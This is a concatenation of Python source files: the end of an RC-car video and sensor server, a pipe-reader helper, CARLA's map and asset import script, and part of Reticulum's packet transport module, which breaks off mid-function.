self.obj_detection.green_light: print("Green light") pass elif self.obj_detection.yellow_light: print("Yellow light flashing") pass self.d_light = 30 self.obj_detection.red_light = False self.obj_detection.green_light = False self.obj_detection.yellow_light = False else: self.rc_car.steer(prediction) self.stop_start = cv2.getTickCount() self.d_stop_sign = 25 if stop_sign_active is False: self.drive_time_after_stop = (self.stop_start - self.stop_finish) / cv2.getTickFrequency() if self.drive_time_after_stop > 5: stop_sign_active = True if cv2.waitKey(1) & 0xFF == ord('q'): self.rc_car.stop() break cv2.destroyAllWindows() finally: print "Connection closed on thread 1" class ThreadServer(object): def server_thread(host, port): server = SocketServer.TCPServer((host, port), VideoStreamHandler) server.serve_forever() def server_thread2(host, port): server = SocketServer.TCPServer((host, port), SensorDataHandler) server.serve_forever() distance_thread = threading.Thread(target=server_thread2, args=('192.168.137.1', 8004)) distance_thread.start() video_thread = threading.Thread(target=server_thread('192.168.137.1', 8002)) video_thread.start() if __name__ == '__main__': ThreadServer()
pipereader.py
''' Created on Sep 16, 2015 @author: anotherpyr ''' from threading import Thread from Queue import Queue, Empty class PipeReader: def __init__(self, pipe): self.queue = Queue() self.pipe = pipe t = Thread(target=self.enqueue) t.daemon = True t.start() def enqueue(self): for line in iter(self.pipe.readline, b''): self.queue.put(line) self.pipe.close() def readline(self): line = None try: line = self.queue.get_nowait() except Empty: line = None return line
Import.py
#!/usr/bin/env python # Copyright (c) 2019 Computer Vision Center (CVC) at the Universitat Autonoma de # Barcelona (UAB). # # This work is licensed under the terms of the MIT license. # For a copy, see <https://opensource.org/licenses/MIT>. """Import Assets to Carla""" from __future__ import print_function import errno import fnmatch import glob import json import os import shutil import subprocess import sys import argparse import threading import copy # Global variables IMPORT_SETTING_FILENAME = "importsetting.json" SCRIPT_NAME = os.path.basename(__file__) SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__)) # Go two directories above the current script CARLA_ROOT_PATH = os.path.normpath(SCRIPT_DIR + '/../..') try: sys.path.append(glob.glob(os.path.join(CARLA_ROOT_PATH, "PythonAPI/carla/dist/carla-*%d.%d-%s.egg" % ( sys.version_info.major, sys.version_info.minor, 'win-amd64' if os.name == 'nt' else 'linux-x86_64')))[0]) except IndexError: pass import carla def get_packages_json_list(folder): """Returns a list with the paths of each package's json files that has been found recursively in the input folder. """ json_files = [] for root, _, filenames in os.walk(folder): for filename in fnmatch.filter(filenames, "*.json"): if filename != "roadpainter_decals.json": json_files.append([root, filename]) return json_files def get_decals_json_file(folder): for root, _, filenames in os.walk(folder): for filename in fnmatch.filter(filenames, "roadpainter_decals.json"): return filename return "" def generate_json_package(folder, package_name, use_carla_materials): """Generate a .json file with all the maps it founds on the folder and subfolders. A map is a .fbx and a .xodr with the same name. """ json_files = [] # search for all .fbx and .xodr pair of files maps = [] for root, _, filenames in os.walk(folder): files = fnmatch.filter(filenames, "*.xodr") for file_name in files: xodr = file_name[:-5] # check if exist the .fbx file if os.path.exists("%s/%s.fbx" % (root, xodr)): maps.append([os.path.relpath(root, folder), xodr, ["%s.fbx" % xodr]]) else: # check if exist the map by tiles tiles = fnmatch.filter(filenames, "*_Tile_*.fbx") if (len(tiles) > 0): maps.append([os.path.relpath(root, folder), xodr, tiles]) # write the json if (len(maps) > 0): # build all the maps in .json format json_maps = [] for map_name in maps: path = map_name[0].replace('\\', '/') name = map_name[1] tiles = map_name[2] tiles = ["%s/%s" % (path, x) for x in tiles] map_dict = { 'name': name, 'xodr': '%s/%s.xodr' % (path, name), 'use_carla_materials': use_carla_materials } # check for only one 'source' or map in 'tiles' if (len(tiles) == 1): map_dict['source'] = tiles[0] else: map_dict['tile_size'] = 2000 map_dict['tiles'] = tiles # write json_maps.append(map_dict) # build and write the .json f = open("%s/%s.json" % (folder, package_name), "w") my_json = {'maps': json_maps, 'props': []} serialized = json.dumps(my_json, sort_keys=False, indent=3) f.write(serialized) f.close() # add json_files.append([folder, "%s.json" % package_name]) return json_files def generate_decals_file(folder): # search for all .fbx and .xodr pair of files maps = [] for root, _, filenames in os.walk(folder): files = fnmatch.filter(filenames, "*.xodr") for file_name in files: xodr = file_name[:-5] # check if exist the .fbx file if os.path.exists("%s/%s.fbx" % (root, xodr)): maps.append([os.path.relpath(root, folder), xodr, ["%s.fbx" % xodr]]) else: # check if exist the map by tiles tiles = fnmatch.filter(filenames, "*_Tile_*.fbx") if (len(tiles) > 0): maps.append([os.path.relpath(root, folder), xodr, tiles]) if (len(maps) > 0): # build all the maps in .json format json_decals = [] for map_name in maps: name = map_name[1] #create the decals default config file json_decals.append({ 'map_name' : name, 'drip1': '10', 'drip3': '10', 'dirt1': '10', 'dirt3' : '10', 'dirt4' : '10', 'dirt5': '10', 'roadline1': '20', 'roadline5': '20', 'tiremark1': '20', 'tiremark3': '20', 'tarsnake1': '10', 'tarsnake3': '20', 'tarsnake4': '10', 'tarsnake5': '20', 'tarsnake11': '20', 'cracksbig1': '10', 'cracksbig3': '10', 'cracksbig5': '10', 'cracksbig8': '10', 'mud1' : '10', 'mud5' : '10', 'oilsplat1' : '20', 'oilsplat2' : '20', 'oilsplat3' : '20', 'oilsplat4' : '20', 'oilsplat5' : '20', 'gum' : '30', 'crack1': '10', 'crack3' : '10', 'crack4' : '10', 'crack5' : '10', 'crack8': '10', 'decal_scale' : { 'x_axis' : '1.0', 'y_axis' : '1.0', 'z_axis' : '1.0'}, 'fixed_decal_offset': { 'x_axis' : '15.0', 'y_axis' : '15.0', 'z_axis' : '0.0'}, 'decal_min_scale' : '0.3', 'decal_max_scale' : '0.7', 'decal_random_yaw' : '360.0', 'random_offset' : '50.0' }); # build and write the .json f = open("%s/%s.json" % (folder, 'roadpainter_decals'), "w") my_json = {'decals': json_decals} serialized = json.dumps(my_json, sort_keys=False, indent=3) f.write(serialized) f.close() def invoke_commandlet(name, arguments): """Generic function for running a commandlet with its arguments.""" ue4_path = os.environ["UE4_ROOT"] uproject_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "CarlaUE4.uproject") run = "-run=%s" % (name) if os.name == "nt": sys_name = "Win64" editor_path = "%s/Engine/Binaries/%s/UE4Editor" % (ue4_path, sys_name) command = [editor_path, uproject_path, run] command.extend(arguments) print("Commandlet:", command) subprocess.check_call(command, shell=True) elif os.name == "posix": sys_name = "Linux" editor_path = "%s/Engine/Binaries/%s/UE4Editor" % (ue4_path, sys_name) full_command = "%s %s %s %s" % (editor_path, uproject_path, run, " ".join(arguments)) print("Commandlet:", full_command) subprocess.call([full_command], shell=True) def generate_import_setting_file(package_name, json_dirname, props, maps, do_tiles, tile_size): """Creates the PROPS and MAPS import_setting.json file needed as an argument for using the ImportAssets commandlet """ importfile = os.path.join(os.getcwd(), IMPORT_SETTING_FILENAME) if os.path.exists(importfile): os.remove(importfile) with open(importfile, "w+") as fh: import_groups = [] file_names = [] import_settings = { "bImportMesh": 1, "bConvertSceneUnit": 1, "bConvertScene": 1, "bCombineMeshes": 1, "bImportTextures": 1, "bImportMaterials": 1, "bRemoveDegenerates": 1, "AnimSequenceImportData": {}, "SkeletalMeshImportData": {}, "TextureImportData": {}, "StaticMeshImportData": { "bRemoveDegenerates": 1, "bAutoGenerateCollision": 1, "bCombineMeshes": 0, "bConvertSceneUnit": 1, "bForceVerticesRelativeToTile": do_tiles, "TileSize": tile_size } } for prop in props: props_dest = "/" + "/".join(["Game", package_name, "Static", prop["tag"], prop["name"]]) file_names = [os.path.join(json_dirname, prop["source"])] import_groups.append({ "ImportSettings": import_settings, "FactoryName": "FbxFactory", "DestinationPath": props_dest, "bReplaceExisting": "true", "FileNames": file_names }) for umap in maps: maps_dest = "/" + "/".join(["Game", package_name, "Maps", umap["name"]]) if "source" in umap: tiles = [os.path.join(json_dirname, umap["source"])] else: tiles = ["%s" % (os.path.join(json_dirname, x)) for x in umap["tiles"]] import_groups.append({ "ImportSettings": import_settings, "FactoryName": "FbxFactory", "DestinationPath": maps_dest, "bReplaceExisting": "true", "FileNames": tiles }) fh.write(json.dumps({"ImportGroups": import_groups})) fh.close() return importfile def generate_package_file(package_name, props, maps): """Creates the PackageName.Package.json file for the package.""" output_json = {} output_json["props"] = [] for prop in props: name = prop["name"] size = prop["size"] source_name = os.path.basename(prop["source"]).split('.') if len(source_name) < 2: print("[Warning] File name '" + prop["source"] + "' contains multiple dots ('.')") source_name = '.'.join([source_name[0], source_name[0]]) path = "/" + "/".join(["Game", package_name, "Static", prop["tag"], prop["name"], source_name]) output_json["props"].append({ "name": name, "path": path, "size": size, }) output_json["maps"] = [] for umap in maps: path = "/" + "/".join(["Game", package_name, "Maps", umap["name"]]) use_carla_materials = umap["use_carla_materials"] if "use_carla_materials" in umap else False output_json["maps"].append({ "name": umap["name"], "path": path, "use_carla_materials": use_carla_materials }) package_config_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Config") if not os.path.exists(package_config_path): try: os.makedirs(package_config_path) except OSError as exc: if exc.errno != errno.EEXIST: raise with open(os.path.join(package_config_path, package_name + ".Package.json"), "w+") as fh: json.dump(output_json, fh, indent=4) def copy_roadpainter_config_files(package_name): """Copies roadpainter configuration files into Unreal content folder""" two_directories_up = os.path.dirname(os.path.dirname(os.path.dirname(__file__))) final_path = os.path.join(two_directories_up, "Import", "roadpainter_decals.json") package_config_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Config") if not os.path.exists(package_config_path): try: os.makedirs(package_config_path) except OSError as exc: if exc.errno != errno.EEXIST: raise shutil.copy(final_path, package_config_path) def copy_roadpainter_config_files(package_name): """Copies roadpainter configuration files into Unreal content folder""" two_directories_up = os.path.dirname(os.path.dirname(os.path.dirname(__file__))) final_path = os.path.join(two_directories_up, "Import", "roadpainter_decals.json") package_config_path = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Config") if not os.path.exists(package_config_path): try: os.makedirs(package_config_path) except OSError as exc: if exc.errno != errno.EEXIST: raise shutil.copy(final_path, package_config_path) def import_assets(package_name, json_dirname, props, maps, do_tiles, tile_size, batch_size): """Same commandlet is used for importing assets and also maps.""" commandlet_name = "ImportAssets" if do_tiles: for umap in maps: # import groups of tiles to prevent unreal from using too much memory map_template = {} for key, value in iter(umap.items()): if key is not 'tiles': map_template[key] = value map_template['tiles'] = [] tiles = umap['tiles'] tiles.sort() total_tiles = len(tiles) num_batches = int(total_tiles / batch_size) current_tile = 0 current_batch = 0 current_batch_size = 0 current_batch_map = copy.deepcopy(map_template) # get groups of tiles while current_tile < total_tiles: current_batch_map['tiles'].append(tiles[current_tile]) file_path = os.path.join(json_dirname, tiles[current_tile]) current_batch_size += os.path.getsize(file_path)/1000000.0 current_tile += 1 current_batch += 1 # import when the size of the group of tiles surpasses the specified size in MB if current_batch_size >= batch_size: import_setting_file = generate_import_setting_file(package_name, json_dirname, props, [current_batch_map], do_tiles, tile_size) commandlet_arguments = ["-importSettings=\"%s\"" % import_setting_file, "-nosourcecontrol", "-replaceexisting"] invoke_commandlet(commandlet_name, commandlet_arguments) os.remove(import_setting_file) current_batch_map = copy.deepcopy(map_template) current_batch = 0 current_batch_size = 0 # import remaining tiles if current_batch > 0: import_setting_file = generate_import_setting_file(package_name, json_dirname, props, [current_batch_map], do_tiles, tile_size) commandlet_arguments = ["-importSettings=\"%s\"" % import_setting_file, "-nosourcecontrol", "-replaceexisting"] invoke_commandlet(commandlet_name, commandlet_arguments) os.remove(import_setting_file) else: # Import Props import_setting_file = generate_import_setting_file(package_name, json_dirname, props, maps, do_tiles, tile_size) commandlet_arguments = ["-importSettings=\"%s\"" % import_setting_file, "-nosourcecontrol", "-replaceexisting"] invoke_commandlet(commandlet_name, commandlet_arguments) os.remove(import_setting_file) # Move maps XODR files if any for umap in maps: # Make sure XODR info is full and the file exists if "xodr" in umap and umap["xodr"] and os.path.isfile(os.path.join(json_dirname, umap["xodr"])): # Make sure the `.xodr` file have the same name than the `.umap` xodr_path = os.path.abspath(os.path.join(json_dirname, umap["xodr"])) umap_name = umap["name"] xodr_name = '.'.join([umap_name, "xodr"]) xodr_folder_destin = os.path.join( CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Maps", umap_name, "OpenDrive") if not os.path.exists(xodr_folder_destin): os.makedirs(xodr_folder_destin) xodr_path_destin = os.path.join( xodr_folder_destin, xodr_name) print('Copying "' + xodr_path + '" to "' + xodr_path_destin + '"') shutil.copy2(xodr_path, xodr_path_destin) # Create package file generate_package_file(package_name, props, maps) def import_assets_from_json_list(json_list, batch_size): maps = [] package_name = "" for dirname, filename in json_list: # Read json file with open(os.path.join(dirname, filename)) as json_file: data = json.load(json_file) # Take all the fbx registered in the provided json files # and place it inside unreal in the provided path (by the json file) maps = [] props = [] if "maps" in data: maps = data["maps"] if "props" in data: props = data["props"] if "tile_size" in maps[0]: tile_size = maps[0]["tile_size"] else: tile_size = 2000 package_name = filename.replace(".json", "") # we need to build the binary file for navigation of pedestrians thr = threading.Thread(target=build_binary_for_navigation, args=(package_name, dirname, maps,)) thr.start() if ("tiles" in maps[0]): import_assets(package_name, dirname, props, maps, 1, tile_size, batch_size) else: import_assets(package_name, dirname, props, maps, 0, 0, 0) if not package_name: print("No Packages JSONs found, nothing to import. Skipping package.") continue # First we only move the meshes to the tagged folders for semantic segmentation move_assets_commandlet(package_name, maps) # We prepare only the maps for cooking after moving them. Props cooking will be done from Package.sh script. if len(maps) > 0: prepare_maps_commandlet_for_cooking(package_name, only_prepare_maps=True) load_asset_materials_commandlet(package_name) thr.join() build_binary_for_tm(package_name, dirname, maps) def load_asset_materials_commandlet(package_name): commandlet_name = "LoadAssetMaterials" commandlet_arguments = ["-PackageName=%s" % package_name] invoke_commandlet(commandlet_name, commandlet_arguments) def prepare_maps_commandlet_for_cooking(package_name, only_prepare_maps): commandlet_name = "PrepareAssetsForCooking" commandlet_arguments = ["-PackageName=%s" % package_name] commandlet_arguments.append("-OnlyPrepareMaps=%d" % only_prepare_maps) invoke_commandlet(commandlet_name, commandlet_arguments) def move_assets_commandlet(package_name, maps): commandlet_name = "MoveAssets" commandlet_arguments = ["-PackageName=%s" % package_name] umap_names = "" for umap in maps: umap_names += umap["name"] + " " commandlet_arguments.append("-Maps=%s" % umap_names) invoke_commandlet(commandlet_name, commandlet_arguments) # build the binary file for navigation of pedestrians for that map def build_binary_for_navigation(package_name, dirname, maps): folder = os.path.join(CARLA_ROOT_PATH, "Util", "DockerUtils", "dist") # process each map for umap in maps: # get the sources for the map (single or tiles) if ("source" in umap): tiles = [umap["source"]] # disabled until we have a new Recast adapted to work with tiles # elif ("tiles" in umap): # tiles = umap["tiles"] else: continue # get the target name target_name = umap["name"] xodr_filename = os.path.basename(umap["xodr"]) # copy the XODR file into docker utils folder if "xodr" in umap and umap["xodr"] and os.path.isfile(os.path.join(dirname, umap["xodr"])): # Make sure the `.xodr` file have the same name than the `.umap` xodr_path_source = os.path.abspath(os.path.join(dirname, umap["xodr"])) xodr_path_target = os.path.join(folder, xodr_filename) # copy print('Copying "' + xodr_path_source + '" to "' + xodr_path_target + '"') shutil.copy2(xodr_path_source, xodr_path_target) for tile in tiles: fbx_filename = os.path.basename(tile) fbx_name_no_ext = os.path.splitext(fbx_filename)[0] # copy the FBX file into docker utils folder if os.path.isfile(os.path.join(dirname, tile)): # Make sure the `.fbx` file have the same name than the `.umap` fbx_path_source = os.path.abspath(os.path.join(dirname, tile)) fbx_path_target = os.path.join(folder, fbx_filename) # copy print('Copying "' + fbx_path_source + '" to "' + fbx_path_target + '"') shutil.copy2(fbx_path_source, fbx_path_target) # rename the xodr with the same name of the source/tile # os.rename(os.path.join(folder, xodr_filename), os.path.join(folder, "%s.xodr" % fbx_name_no_ext)) # make the conversion if os.name == "nt": subprocess.call(["build.bat", fbx_name_no_ext, xodr_filename], cwd=folder, shell=True) else: subprocess.call(["chmod +x build.sh"], cwd=folder, shell=True) subprocess.call("./build.sh %s %s" % (fbx_name_no_ext, xodr_filename), cwd=folder, shell=True) # rename the xodr with the original name # os.rename(os.path.join(folder, "%s.xodr" % fbx_name_no_ext), os.path.join(folder, xodr_filename)) # copy the binary file nav_path_source = os.path.join(folder, "%s.bin" % fbx_name_no_ext) nav_folder_target = os.path.join(CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Maps", target_name, "Nav") if os.path.exists(nav_path_source): if not os.path.exists(nav_folder_target): os.makedirs(nav_folder_target) nav_path_target = os.path.join(nav_folder_target, "%s.bin" % fbx_name_no_ext) print('Copying "' + nav_path_source + '" to "' + nav_path_target + '"') shutil.copy2(nav_path_source, nav_path_target) # remove files if os.path.exists(nav_path_source): os.remove(nav_path_source) if os.path.exists(fbx_path_target): os.remove(fbx_path_target) os.remove(xodr_path_target) def build_binary_for_tm(package_name, dirname, maps): xodrs = set( (map["name"], map["xodr"]) for map in maps if "xodr" in map) for target_name, xodr in xodrs: with open(os.path.join(dirname, xodr), "rt") as f: data = f.read() # copy the binary file tm_folder_target = os.path.join( CARLA_ROOT_PATH, "Unreal", "CarlaUE4", "Content", package_name, "Maps", target_name, "TM") if not os.path.exists(tm_folder_target): os.makedirs(tm_folder_target) m = carla.Map(str(target_name), data) m.cook_in_memory_map(str(os.path.join(tm_folder_target, "%s.bin" % target_name))) def main(): argparser = argparse.ArgumentParser(description=__doc__) argparser.add_argument( '--package', metavar='P', default='map_package', help='Name of the imported package') argparser.add_argument( '--no-carla-materials', action='store_false', help='user Carla materials') argparser.add_argument( '--json-only', action='store_true', help='Create JSON files only') argparser.add_argument( '--batch-size', type=float, default=300, help='Max batch size in MB') args = argparser.parse_known_args()[0] import_folder = os.path.join(CARLA_ROOT_PATH, "Import") json_list = get_packages_json_list(import_folder) decals_json = get_decals_json_file(import_folder) if len(json_list) < 1: json_list = generate_json_package(import_folder, args.package, args.no_carla_materials) if len(decals_json) == 0: decals_json_file = generate_decals_file(import_folder) if args.json_only == False: copy_roadpainter_config_files(args.package) import_assets_from_json_list(json_list, args.batch_size) if __name__ == '__main__': main()
Transport.py
import os import RNS import time import math import threading import traceback from time import sleep import vendor.umsgpack as umsgpack class Transport: # Constants BROADCAST = 0x00; TRANSPORT = 0x01; RELAY = 0x02; TUNNEL = 0x03; types = [BROADCAST, TRANSPORT, RELAY, TUNNEL] REACHABILITY_UNREACHABLE = 0x00 REACHABILITY_DIRECT = 0x01 REACHABILITY_TRANSPORT = 0x02 # TODO: Document the addition of random windows # and max local rebroadcasts. PATHFINDER_M = 18 # Max hops PATHFINDER_C = 2.0 # Decay constant PATHFINDER_R = 2 # Retransmit retries PATHFINDER_T = 10 # Retry grace period PATHFINDER_RW = 10 # Random window for announce rebroadcast PATHFINDER_E = 60*15 # Path expiration in seconds # TODO: Calculate an optimal number for this in # various situations LOCAL_REBROADCASTS_MAX = 2 # How many local rebroadcasts of an announce is allowed interfaces = [] # All active interfaces destinations = [] # All active destinations pending_links = [] # Links that are being established active_links = [] # Links that are active packet_hashlist = [] # A list of packet hashes for duplicate detection receipts = [] # Receipts of all outgoing packets for proof processing announce_table = {} # A table for storing announces currently waiting to be retransmitted destination_table = {} # A lookup table containing the next hop to a given destination jobs_locked = False jobs_running = False job_interval = 0.250 receipts_last_checked = 0.0 receipts_check_interval = 1.0 announces_last_checked = 0.0 announces_check_interval = 1.0 hashlist_maxsize = 1000000 identity = None @staticmethod def start(): if Transport.identity == None: transport_identity_path = RNS.Reticulum.configdir+"/transportidentity" if os.path.isfile(transport_identity_path): Transport.identity = RNS.Identity.from_file(transport_identity_path) if Transport.identity == None: RNS.log("No valid Transport Identity on disk, creating...", RNS.LOG_VERBOSE) Transport.identity = RNS.Identity() Transport.identity.save(transport_identity_path) else: RNS.log("Loaded Transport Identity from disk", RNS.LOG_VERBOSE) packet_hashlist_path = RNS.Reticulum.configdir+"/packet_hashlist" if os.path.isfile(packet_hashlist_path): try: file = open(packet_hashlist_path, "r") Transport.packet_hashlist = umsgpack.unpackb(file.read()) file.close() except Exception as e: RNS.log("Could not load packet hashlist from disk, the contained exception was: "+str(e), RNS.LOG_ERROR) thread = threading.Thread(target=Transport.jobloop) thread.setDaemon(True) thread.start() RNS.log("Transport instance "+str(Transport.identity)+" started") @staticmethod def jobloop(): while (True): Transport.jobs() sleep(Transport.job_interval) @staticmethod def jobs(): outgoing = [] Transport.jobs_running = True try: if not Transport.jobs_locked: # Process receipts list for timed-out packets if time.time() > Transport.receipts_last_checked+Transport.receipts_check_interval: for receipt in Transport.receipts: thread = threading.Thread(target=receipt.check_timeout) thread.setDaemon(True) thread.start() if receipt.status != RNS.PacketReceipt.SENT: Transport.receipts.remove(receipt) Transport.receipts_last_checked = time.time() # Process announces needing retransmission if time.time() > Transport.announces_last_checked+Transport.announces_check_interval: for destination_hash in Transport.announce_table: announce_entry = Transport.announce_table[destination_hash] # TODO: remove comment and log output # [time_heard, retransmit_timeout, retries, received_from, packet.hops, packet] # RNS.log("Announce entry retries: "+str(announce_entry[2]), RNS.LOG_INFO) # RNS.log("Max retries: "+str(Transport.PATHFINDER_R), RNS.LOG_INFO) if announce_entry[2] > Transport.PATHFINDER_R: RNS.log("Dropping announce for "+RNS.prettyhexrep(destination_hash)+", retries exceeded", RNS.LOG_DEBUG) Transport.announce_table.pop(destination_hash) break else: if time.time() > announce_entry[1]: announce_entry[1] = time.time() + math.pow(Transport.PATHFINDER_C, announce_entry[4]) + Transport.PATHFINDER_T + Transport.PATHFINDER_RW announce_entry[2] += 1 packet = announce_entry[5] announce_data = packet.data announce_identity = RNS.Identity.recall(packet.destination_hash) announce_destination = RNS.Destination(announce_identity, RNS.Destination.OUT, RNS.Destination.SINGLE, "unknown", "unknown"); announce_destination.hash = packet.destination_hash announce_destination.hexhash = announce_destination.hash.encode("hex_codec") new_packet = RNS.Packet(announce_destination, announce_data, RNS.Packet.ANNOUNCE, header_type = RNS.Packet.HEADER_2, transport_type = Transport.TRANSPORT, transport_id = Transport.identity.hash) new_packet.hops = announce_entry[4] RNS.log("Rebroadcasting announce for "+RNS.prettyhexrep(announce_destination.hash)+" with hop count "+str(new_packet.hops), RNS.LOG_DEBUG) outgoing.append(new_packet) Transport.announces_last_checked = time.time() # Cull the packet hashlist if it has reached max size while (len(Transport.packet_hashlist) > Transport.hashlist_maxsize): Transport.packet_hashlist.pop(0) except Exception as e: RNS.log("An exception occurred while running Transport jobs.", RNS.LOG_ERROR) RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR) traceback.print_exc() Transport.jobs_running = False for packet in outgoing: packet.send() @staticmethod def outbound(packet): while (Transport.jobs_running): sleep(0.01) Transport.jobs_locked = True packet.updateHash() sent = False for interface in Transport.interfaces: if interface.OUT: should_transmit = True if packet.destination.type == RNS.Destination.LINK: if packet.destination.status == RNS.Link.CLOSED: should_transmit = False if interface != packet.destination.attached_interface: should_transmit = False if should_transmit: # TODO: Remove RNS.log("Transmitting "+str(len(packet.raw))+" bytes via: "+str(interface), RNS.LOG_EXTREME) RNS.log("Hash is "+RNS.prettyhexrep(packet.packet_hash), RNS.LOG_EXTREME) interface.processOutgoing(packet.raw) sent = True if sent: packet.sent = True packet.sent_at = time.time() if (packet.packet_type == RNS.Packet.DATA): packet.receipt = RNS.PacketReceipt(packet) Transport.receipts.append(packet.receipt) Transport.cache(packet) Transport.jobs_locked = False return sent @staticmethod def packet_filter(packet): # TODO: Think long and hard about this if packet.context == RNS.Packet.KEEPALIVE: return True if packet.context == RNS.Packet.RESOURCE_REQ: return True if packet.context == RNS.Packet.RESOURCE_PRF: return True if not packet.packet_hash in Transport.packet_hashlist: return True return False @staticmethod def inbound(raw, interface=None): while (Transport.jobs_running): sleep(0.1) Transport.jobs_locked = True packet = RNS.Packet(None, raw) packet.unpack() packet.updateHash() packet.receiving_interface = interface RNS.log(str(interface)+" received packet with hash "+RNS.prettyhexrep(packet.packet_hash), RNS.LOG_EXTREME) # TODO: Rewrite these redundant cache calls if Transport.packet_filter(packet): Transport.packet_hashlist.append(packet.packet_hash) if packet.packet_type == RNS.Packet.ANNOUNCE: if RNS.Identity.validateAnnounce(packet): if (packet.transport_id != None): received_from = packet.transport_id # Check if this is a next retransmission from # another node. If it is, we're removing the # announce in question from our pending table if packet.destination_hash in Transport.announce_table: announce_entry = Transport.announce_table[packet.destination_hash] if packet.hops == announce_entry[4]: RNS.log("Heard a local rebroadcast of announce for "+RNS.prettyhexrep(packet.destination_hash), RNS.LOG_DEBUG) announce_entry[6] += 1 if announce_entry[6] >= Transport.LOCAL_REBROADCASTS_MAX: RNS.log("Max local rebroadcasts of announce for "+RNS.prettyhexrep(packet.destination_hash)+" reached, dropping announce from our table", RNS.LOG_DEBUG) Transport.announce_table.pop(packet.destination_hash) if packet.hops == announce_entry[4]+1 and announce_entry[2] > 0: now = time.time() if now < announce_entry[1]: RNS.log("Rebroadcasted announce for "+RNS.prettyhexrep(packet.destination_hash)+" has been passed on to next node, no further tries needed", RNS.LOG_DEBUG) Transport.announce_table.pop(packet.destination_hash) else: received_from = packet.destination_hash # Check if this announce should be inserted into # announce and destination tables should_add = False packet.hops += 1 # First, check that the announce is not for a destination # local to this system, and that hops are less than the max if (not any(packet.destination_hash == d.hash for d in Transport.destinations) and packet.hops < Transport.PATHFINDER_M+1): random_blob = packet.data[RNS.Identity.DERKEYSIZE/8+10:RNS.Identity.DERKEYSIZE/8+20] random_blobs = [] if packet.destination_hash in Transport.destination_table: random_blobs = Transport.destination_table[packet.destination_hash][4] # If we already have a path to the announced # destination, but the hop count is equal or # less, we'll update our tables. if packet.hops <= Transport.destination_table[packet.destination_hash][2]: # Make sure we haven't heard the random # blob before, so announces can't be # replayed to forge paths. # TODO: Check whether this approach works # under all circumstances if not random_blob in random_blobs: should_add = True else: should_add = False else: # If an announce arrives with a larger hop # count than we already have in the table, # ignore it, unless the path is expired if (time.time() > Transport.destination_table[packet.destination_hash][3]): # We also check that the announce hash is # different from ones we've already heard, # to avoid loops in the network if not random_blob in random_blobs: # TODO: Check that this ^ approach actually # works under all circumstances RNS.log("Replacing destination table entry for "+str(RNS.prettyhexrep(packet.destination_hash))+" with new announce due to expired path", RNS.LOG_DEBUG) should_add = True else: should_add = False else: should_add = False else: # If this destination is unknown in our table # we should add it should_add = True if should_add: now = time.time() retries = 0 expires = now + Transport.PATHFINDER_E local_rebroadcasts = 0 random_blobs.append(random_blob) retransmit_timeout = now + math.pow(Transport.PATHFINDER_C, packet.hops) + (RNS.rand() * Transport.PATHFINDER_RW) Transport.announce_table[packet.destination_hash] = [now, retransmit_timeout, retries, received_from, packet.hops, packet, local_rebroadcasts] Transport.destination_table[packet.destination_hash] = [now, received_from, packet.hops, expires, random_blobs] elif packet.packet_type == RNS.Packet.LINKREQUEST: for destination in Transport.destinations: if destination.hash == packet.destination_hash and destination.type == packet.destination_type: packet.destination = destination destination.receive(packet) Transport.cache(packet) elif packet.packet_type == RNS.Packet.DATA: if packet.destination_type == RNS.Destination.LINK: for link in Transport.active_links: if link.link_id == packet.destination_hash: packet.link = link link.receive(packet) Transport.cache(packet) else: for destination in Transport.destinations: if destination.hash == packet.destination_hash and destination.type == packet.destination_type: packet.destination = destination destination.receive(packet) Transport.cache(packet) if destination.proof_strategy == RNS.Destination.PROVE_ALL: packet.prove() elif destination.proof_strategy == RNS.Destination.PROVE_APP: if destination.callbacks.proof_requested: if destination.callbacks.proof_requested(packet): packet.prove() elif packet.packet_type == RNS.Packet.PROOF: if packet.context == RNS.Packet.LRPROOF: # This is a link request proof, forward # to a waiting link request for link in Transport.pending_links: if link.link_id == packet.destination_hash: link.validateProof(packet) elif packet.context == RNS.Packet.RESOURCE_PRF: for link in Transport.active_links: if link.link_id == packet.destination_hash: link.receive(packet) else: if packet.destination_type == RNS.Destination.LINK: for link in Transport.active_links: if link.link_id == packet.destination_hash: packet.link = link # plaintext = link.decrypt(packet.data) # TODO: Make sure everything uses new proof handling if len(packet.data) == RNS.PacketReceipt.EXPL_LENGTH: proof_hash = packet.data[:RNS.Identity.HASHLENGTH/8] else: proof_hash = None for receipt in Transport.receipts: receipt_validated = False if proof_hash != None: # Only test validation if hash matches if receipt.hash == proof_hash: receipt_validated = receipt.validateProofPacket(packet) else: # In case of an implicit proof, we have # to check every single outstanding receipt receipt_validated = receipt.validateProofPacket(packet) if receipt_validated: Transport.receipts.remove(receipt) Transport.jobs_locked = False @staticmethod def registerDestination(destination): destination.MTU = RNS.Reticulum.MTU if destination.direction == RNS.Destination.IN: Transport.destinations.append(destination) @staticmethod def registerLink(link): RNS.log("Registering link "+str(link), RNS.LOG_DEBUG) if link.initiator: Transport.pending_links.append(link) else: Transport.active_links.append(link) @staticmethod def activateLink(link): RNS.log("Activating link "+str(link), RNS.LOG_DEBUG) if link in Transport.pending_links: Transport.pending_links.remove(link) Transport.active_links.append(link) link.status = RNS.Link.ACTIVE else: RNS.log("Attempted to activate a link that was not in the pending table", RNS.LOG_ERROR) @staticmethod def shouldCache(packet): # TODO: Implement sensible rules for which # packets to cache if packet.context == RNS.Packet.RESOURCE_PRF: return True return False @staticmethod def cache(packet): if RNS.Transport.shouldCache(packet): try: packet_hash = RNS.hexrep(packet.getHash(), delimit=False) file = open(RNS.Reticulum.cachepath+"/"+packet_hash, "w") file.write(packet.raw) file.close() RNS.log("Wrote packet "+packet_hash+" to cache", RNS.LOG_EXTREME) except Exception as e: RNS.log("Error writing packet to cache", RNS.LOG_ERROR) RNS.log("The contained exception was: "+str(e)) @staticmethod def cache_request_packet(packet): if len(packet.data) == RNS.Identity.HASHLENGTH/8: packet_hash = RNS.hexrep(packet.data, delimit=False) # TODO: There's some pretty obvious file access # issues here. Make sure this can't happen path = RNS.Reticulum.cachepath+"/"+packet_hash if os.path.isfile(path): file = open(path, "r") raw = 